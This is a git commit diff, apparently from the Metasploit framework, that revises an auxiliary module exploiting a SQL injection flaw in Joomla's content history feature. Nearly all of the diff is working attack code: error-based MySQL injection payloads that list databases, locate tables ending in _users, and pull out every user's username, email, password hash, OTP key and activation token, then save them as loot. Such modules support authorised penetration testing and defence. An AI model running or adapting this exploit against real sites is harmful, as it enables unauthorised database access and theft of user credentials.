Update joomla_contenthistory_sqli.rb

Remove sessions for now
bug/bundler_fix
Brandon Perry 2015-10-23 09:32:15 -05:00
parent e4281dd1fb
commit 07d549d783
1 changed files with 56 additions and 61 deletions

View File

@ -58,69 +58,64 @@ class Metasploit4 < Msf::Auxiliary
left_marker = Rex::Text.rand_text_alpha(5) left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5) right_marker = Rex::Text.rand_text_alpha(5)
if datastore['ACTION'] == 'HASHES' db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" res = sqli(db_count)
res = sqli(db_count) db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
dbs = [] dbs = []
0.upto(db_count-1) do |i| 0.upto(db_count-1) do |i|
db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(db)
res = sqli(db) dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
end
dbs.delete('performance_schema')
dbs.delete('information_schema')
dbs.delete('mysql')
users = []
dbs.each do |db|
tables = []
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(table_count)
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
0.upto(table_count-1) do |i|
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(table)
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
tables << table if table =~ /_users$/
end
tables.each do |table|
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(user_count)
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
0.upto(user_count-1) do |i|
user = {}
cols.each do |col|
k = 1
val = nil
user[col] = ''
while val != ''
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(get_col)
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
user[col] << val
k = k + 54
end
end
users << user
end
end
end
p users.to_json
elsif datastore['ACTION'] == 'SESSIONS'
else
fail_with(Failure::Unknown, "The ACTION " + datastore['ACTION'] + " is not supported.")
end end
dbs.delete('performance_schema')
dbs.delete('information_schema')
dbs.delete('mysql')
users = []
dbs.each do |db|
vprint_status("Found database: " + db)
tables = []
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(table_count)
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
0.upto(table_count-1) do |i|
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(table)
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
tables << table if table =~ /_users$/
end
tables.each do |table|
vprint_status("Found table: " + table)
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(user_count)
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
0.upto(user_count-1) do |i|
user = {}
cols.each do |col|
k = 1
val = nil
user[col] = ''
while val != ''
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
res = sqli(get_col)
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
user[col] << val
k = k + 54
end
end
users << user
end
end
end
path = store_loot('joomla.file', 'text/plain', datastore['RHOST'], users.to_json, 'joomla.users')
print_good("Users saved to file: " + path)
end end
def sqli(payload) def sqli(payload)